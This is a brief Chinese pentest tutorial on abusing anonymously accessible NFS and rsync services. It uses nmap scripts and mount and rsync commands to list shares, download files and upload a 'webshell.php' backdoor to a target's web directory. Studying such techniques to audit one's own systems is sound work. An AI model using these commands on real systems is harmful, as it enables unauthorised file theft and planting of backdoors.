NFS Rsync 渗透利用技巧(Nmap)

条件:存在匿名访问


NFS

目录列举

方法1:

nmap -script=nfs-ls.nse 127.0.0.1


方法2. 

挂载到本地

 mount -t nfs 192.168.0.1:/export/home  /tmp/badperms

 为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容。



Rsync

目录列举

方法1:

nmap -script=rsync-list-modules 127.0.0.1


方法2. 

 列举整个同步目录或指定目录:

   rsync 10.0.0.12::

   rsync 10.0.0.12::www/

下载文件或目录到本地:

   rsync -avz 10.0.0.12::www/test.php /root

   rsync -avz 10.0.0.12::www//var/tmp

上传本地文件到服务端:

  rsync -avz webshell.php 10.0.0.12::www/


你可能感兴趣的:(下载文件,Export,IP地址)